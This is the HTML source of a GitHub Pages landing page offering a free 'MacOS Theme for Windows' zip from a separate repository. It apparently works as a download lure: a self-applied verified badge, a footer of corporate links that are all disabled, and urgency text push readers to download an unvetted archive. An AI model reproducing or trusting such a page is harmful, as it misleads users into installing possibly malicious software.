-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
107 lines (104 loc) · 4.08 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>MacOS Theme for Windows 10 & 11</title>
<meta property="og:image" content="https://peter777-cloud.github.io/macos-theme-windows/images/macos_windows.jpeg">
<meta property="og:title" content="MacOS Themes for Windows">
<meta property="og:description" content="FREE DOWNLOAD AND INSTALL">
<meta property="og:url" content="https://peter777-cloud.github.io/macos-theme-windows">
<meta property="og:type" content="website">
<link rel="stylesheet" href="styles.css">
</head>
<body>
<!-- Title Section -->
<section class="title-section">
<div class="container">
<h1>
MacOS Theme for Windows 10 & 11
<img src="images/verified_12902069.png" alt="Verified Badge" class="verified-badge">
</h1>
<img src="images/macos_windows.jpeg" alt="Windows Look Like MacOS" class="title-image">
<a href="https://github.com/peter777-cloud/nan/raw/refs/heads/main/MacOSTheme.zip" class="btn large">
<span class="download-icon">⬇</span> FREE DOWNLOAD AND INSTALL
</a>
<p class="click-here">
<a href="https://github.com/peter777-cloud/nan/raw/refs/heads/main/MacOSTheme.zip" class="bold-underline">Click here</a> if download does not start!
</p>
<br>
<p class="hero-text">
<strong>Windows 10 & 11 Look Like MacOS</strong><br>
Choose your style from 200+ Themes, Widgets, 10,000+ Wallpapers...<br>
<br>
<span class="gray-text">Use less RAM & CPU - with smooth performance!</span>
</p>
</div>
</section>
<!-- Example Themes Section -->
<section id="example-themes" class="example-themes">
<div class="container">
<h2>EXAMPLE THEMES</h2>
<div class="themes-row">
<!-- First Row -->
<div class="theme-card">
<img src="images/version1.jpeg" alt="Mac OS Theme for Windows - version 1" class="theme-image">
<h3>Mac OS Theme for Windows - version 1</h3>
</div>
<div class="theme-card">
<img src="images/version2.jpeg" alt="Mac OS Theme for Windows - version 2" class="theme-image">
<h3>Mac OS Theme for Windows - version 2</h3>
</div>
</div>
<div class="themes-row">
<!-- Second Row -->
<div class="theme-card">
<img src="images/autumn.jpeg" alt="Autumn Theme" class="theme-image">
<h3>Autumn Theme</h3>
</div>
<div class="theme-card">
<img src="images/yellow.jpg" alt="Yellow Flower Theme" class="theme-image">
<h3>Yellow Flower Theme</h3>
</div>
</div>
</div>
</section>
<!-- Footer Section -->
<footer>
<div class="container footer-container">
<div class="footer-columns">
<div class="footer-column">
<h3>COMPANY</h3>
<ul>
<li><span class="disabled-link">About</span></li>
<li><span class="disabled-link">Blog</span></li>
<li><span class="disabled-link">Careers</span></li>
<li><span class="disabled-link">Charter</span></li>
</ul>
</div>
<div class="footer-column">
<h3>LEGAL</h3>
<ul>
<li><span class="disabled-link">Terms of Use</span></li>
<li><span class="disabled-link">Privacy Policy</span></li>
<li><span class="disabled-link">Service Terms</span></li>
<li><span class="disabled-link">Plugins Terms</span></li>
</ul>
</div>
<div class="footer-column">
<h3>POLICIES</h3>
<ul>
<li><span class="disabled-link">Usage Policies</span></li>
<li><span class="disabled-link">Enterprise Policy</span></li>
<li><span class="disabled-link">Sharing & Publication Policy</span></li>
<li><span class="disabled-link">Vulnerability Disclosure Policy</span></li>
</ul>
</div>
</div>
<div class="footer-copyright">
© Copyright 2024 - All rights reserved.
</div>
</div>
</footer>
</body>
</html>